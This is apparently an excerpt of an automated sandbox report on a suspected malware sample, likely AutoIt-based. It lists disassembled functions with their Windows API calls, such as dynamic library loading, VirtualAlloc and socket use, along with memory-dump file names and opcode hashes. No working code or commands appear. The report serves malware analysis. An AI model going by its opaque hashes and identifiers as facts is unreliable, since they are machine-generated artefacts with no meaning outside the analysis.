                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 1c3f52053f1fac2f1e9cdd1738ab5b992e3b04639ff8423555aa33e94730e634
                                                            • Instruction ID: 23614d184ecc9bd896339572257a3e395597fea8a56fd9a04dadb02069438cf4
                                                            • Opcode Fuzzy Hash: 1c3f52053f1fac2f1e9cdd1738ab5b992e3b04639ff8423555aa33e94730e634
                                                            • Instruction Fuzzy Hash: D411C172254208BBEF14AF64CC05FEB3BA9FF89764F050629FA41E6091D2719851CB60
                                                            Function 00814C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00814C2E), ref: 00814CA3
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00814CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: e92917b56f2887e934959a8524591b6f7413c18dfd6c30a83e8ea8dd48c67e1d
                                                            • Instruction ID: 0367ab3c100a13044e56edbc0d53dff24fd3cf9f82aaab4f45e096420cf83a32
                                                            • Opcode Fuzzy Hash: e92917b56f2887e934959a8524591b6f7413c18dfd6c30a83e8ea8dd48c67e1d
                                                            • Instruction Fuzzy Hash: 4DD05E30610723CFDB24AF31DE1864676E9FF057A1B29C83EE996D6261E774D8C0CA90
                                                            Function 00814D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00814CE1,?), ref: 00814DA2
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814DB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 8ad6a5db28ef04b6b0fa1e9d3664eb07ed48175842655e51f4df0aa01c2aa3e2
                                                            • Instruction ID: af334b16be74dd365c489a0860e5bdac9b86e6e3fff2dc45c45f017d9d0be2f6
                                                            • Opcode Fuzzy Hash: 8ad6a5db28ef04b6b0fa1e9d3664eb07ed48175842655e51f4df0aa01c2aa3e2
                                                            • Instruction Fuzzy Hash: EDD01731650713CFDB24AF31E808A8676E8FF06355B19883EE9D6D6260E774D8C0CA91
                                                            Function 00814D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00814D2E,?,00814F4F,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814D6F
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814D81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 1e477a9447d7ebbf0f2f2359a9ec88b017b940c5290eaea9755de3a58f63e4c9
                                                            • Instruction ID: ca4dde200f3fdef28e67c9602c6702eaf307552fcd7b24c35d5a93da9af9edfa
                                                            • Opcode Fuzzy Hash: 1e477a9447d7ebbf0f2f2359a9ec88b017b940c5290eaea9755de3a58f63e4c9
                                                            • Instruction Fuzzy Hash: EBD01730610713CFDB25AF31E80865676E8FF15362B29883EE596D6260E674D8C0CB91
                                                            Function 00891072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,008912C1), ref: 00891080
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00891092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: fc01d5272c384f4c524c956f3aca6ff4b9dcc4c6ce164cbecddbf47384785068
                                                            • Instruction ID: edae974ba5b1109d03d4f7b613825dd220e81b96e084b44bcf4d592cef93d508
                                                            • Opcode Fuzzy Hash: fc01d5272c384f4c524c956f3aca6ff4b9dcc4c6ce164cbecddbf47384785068
                                                            • Instruction Fuzzy Hash: 2AD01230510B13CFDB206F75D819A1676F4FF05362F198C3EA499D6250D774C4C0C650
                                                            Function 008893F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00889009,?,0089F910), ref: 00889403
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00889415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: e060e9b4e44cb35fa2e0fbf02e39ea96c4e66d4254d755f956668285573a8bfd
                                                            • Instruction ID: b9e15ab227f050071b57f4fe7a01d9850c2181819e3e42d196d443f4e5e92226
                                                            • Opcode Fuzzy Hash: e060e9b4e44cb35fa2e0fbf02e39ea96c4e66d4254d755f956668285573a8bfd
                                                            • Instruction Fuzzy Hash: 8DD0C730600313CFCB24AF30D90860272E4FF01351B18C83FE5D6C2661E674C880CB90
                                                            Function 00851B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 48f6aed52a9bb1961561a440bb298a207c0cacb8e3b4071122f9f099141e230b
                                                            • Instruction ID: 19197c7dde31ce33d09b81d3073b67c97735e22822a92db1e53eb7d5ad46782c
                                                            • Opcode Fuzzy Hash: 48f6aed52a9bb1961561a440bb298a207c0cacb8e3b4071122f9f099141e230b
                                                            • Instruction Fuzzy Hash: 5AD0ECA180411CEACF489A908848AF9737CFB04326F540992B902D1440F3749B989A62
                                                            Function 008676C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de779b01191a78b986f01e11cbd8767e4f41ad971367e6eeb076395466e9f1f0
                                                            • Instruction ID: cce3ebdfd49f90f35f11fa6ae68b24dc79df78ba5cc3469d2318938c8a9839a0
                                                            • Opcode Fuzzy Hash: de779b01191a78b986f01e11cbd8767e4f41ad971367e6eeb076395466e9f1f0
                                                            • Instruction Fuzzy Hash: 47C15175A0421AEFCB14CFA4C884EAEBBF5FF48718B168599E905EB251D730DD41CB90
                                                            Function 0088E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0088E3D2
                                                            • CharLowerBuffW.USER32(?,?), ref: 0088E415
                                                              • Part of subcall function 0088DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0088DAD9
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0088E615
                                                            • _memmove.LIBCMT ref: 0088E628
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: 0d2c4658ecddece9e610b6d06dc026dd429b8faad37012b3d4bd2e3ac1ac961a
                                                            • Instruction ID: 246fcfc80408b65738372a1483d8b5103b2b220299a65856f71a1b7c8f065c7e
                                                            • Opcode Fuzzy Hash: 0d2c4658ecddece9e610b6d06dc026dd429b8faad37012b3d4bd2e3ac1ac961a
                                                            • Instruction Fuzzy Hash: 94C126716083119FC714EF28C49096ABBE4FF88718F14896EF999DB351E731E946CB82
                                                            Function 008883A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 008883D8
                                                            • CoUninitialize.OLE32 ref: 008883E3
                                                              • Part of subcall function 0086DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0086DAC5
                                                            • VariantInit.OLEAUT32(?), ref: 008883EE
                                                            • VariantClear.OLEAUT32(?), ref: 008886BF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 8ff06e29c7dc24cc341e6fb0e63962a2a581e55925138b90a2edd24658d96f59
                                                            • Instruction ID: 4ccdc2a92b467b89e623488f46baabfc2fb0bba26da3558937c6a7130262eea5
                                                            • Opcode Fuzzy Hash: 8ff06e29c7dc24cc341e6fb0e63962a2a581e55925138b90a2edd24658d96f59
                                                            • Instruction Fuzzy Hash: 0DA112752047119FCB10EF18C895A6ABBE5FF88314F444459F99ADB3A2DB30ED44CB86
                                                            Function 00867A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C32
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C4A
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0089FB80,000000FF,?,00000000,00000800,00000000,?,008A2C7C,?), ref: 00867C6F
                                                            • _memcmp.LIBCMT ref: 00867C90
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: 05c20269861b754c23a248b4e743941112dec115f54572ab35f9c698c9b1d09c
                                                            • Instruction ID: 3744d90d287a210e632162c137466b9df89a8a66c5bce7d33c774f738454928f
                                                            • Opcode Fuzzy Hash: 05c20269861b754c23a248b4e743941112dec115f54572ab35f9c698c9b1d09c
                                                            • Instruction Fuzzy Hash: AD811B71A00109EFCB04DF94C984EEEB7B9FF89315F254198E516EB250DB71AE06CBA1
                                                            Function 00866DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: da8bc2f86112ee5da81085d7824ddb0ce0afbbaec61a17769e182ebb065d96e6
                                                            • Instruction ID: b6e51f8070879de2348510d4a9cf40c0f5b16a1c73e9b6c3742d874623bae1f5
                                                            • Opcode Fuzzy Hash: da8bc2f86112ee5da81085d7824ddb0ce0afbbaec61a17769e182ebb065d96e6
                                                            • Instruction Fuzzy Hash: D151E630608745DADB24AF69D891A6EB3E4FF48314F31881FE596CB291EF7098909B53
                                                            Function 00899A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(017CE6B8,?), ref: 00899AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00899B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00899B72
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: 25b0f3b1e4072fbaf712ad3e75c844b852feb0cd726ac437829f876870f53b3e
                                                            • Instruction ID: 7c62bb494ab375cab0204598536ee9e80de8f11500d5f567e26b6e5e97aa75f2
                                                            • Opcode Fuzzy Hash: 25b0f3b1e4072fbaf712ad3e75c844b852feb0cd726ac437829f876870f53b3e
                                                            • Instruction Fuzzy Hash: A0512C34A00219AFCF14EF58D8809AE7BB9FF55320F18826EF955DB290D734AD91CB90
                                                            Function 00886CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00886CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886CF4
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00886D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886D64
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: 5ac16bb231693aec4ca41e1ee64da89db8e0ecbfbdbea3bed75dce7501179686
                                                            • Instruction ID: c224968c51e4d03890475343af630bcbd89ba4c75394692f07460d8754829d92
                                                            • Opcode Fuzzy Hash: 5ac16bb231693aec4ca41e1ee64da89db8e0ecbfbdbea3bed75dce7501179686
                                                            • Instruction Fuzzy Hash: 7C417F74740210AFEB20BF28DC96F7A77A9FF04B14F548018FA99DB2D2DA719D418792
                                                            Function 0088672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0089F910), ref: 008867BA
                                                            • _strlen.LIBCMT ref: 008867EC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 629e961b061bea2dfe34518b15455a067e08a1e1d3bf20ae3e3031bafd90089f
                                                            • Instruction ID: 0737413edf5843cc4ddfd5576d52d17f937b2c18ec27689de810ab116277fc6f
                                                            • Opcode Fuzzy Hash: 629e961b061bea2dfe34518b15455a067e08a1e1d3bf20ae3e3031bafd90089f
                                                            • Instruction Fuzzy Hash: 92415171A00114ABCB14FB68DCD5EAEB7A9FF44314F148165F92AD7292EB30AD50C792
                                                            Function 0087BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0087BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0087BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0087BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0087BB80
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 3ecfd01f975bb6510b3b5e02f67fe7cf8468f4e80737c8634e59669cfc5bb12a
                                                            • Instruction ID: c4c34c784f9ee848cbee90a9f3b85393b584b328a1ea83da65291fe9489f585a
                                                            • Opcode Fuzzy Hash: 3ecfd01f975bb6510b3b5e02f67fe7cf8468f4e80737c8634e59669cfc5bb12a
                                                            • Instruction Fuzzy Hash: EF411739200610DFCB11EF18C594A5DBBE6FF49320B098488E88ADB366CB34ED41CB92
                                                            Function 00898AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00898B4D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 4210564738584848b22647a39ad9c98a2f7826b5b752d7de3702278e738cfb0d
                                                            • Instruction ID: 9180a52e81737f5ea65825939644ab939ddf48e7852c73598cbff5653ab742d0
                                                            • Opcode Fuzzy Hash: 4210564738584848b22647a39ad9c98a2f7826b5b752d7de3702278e738cfb0d
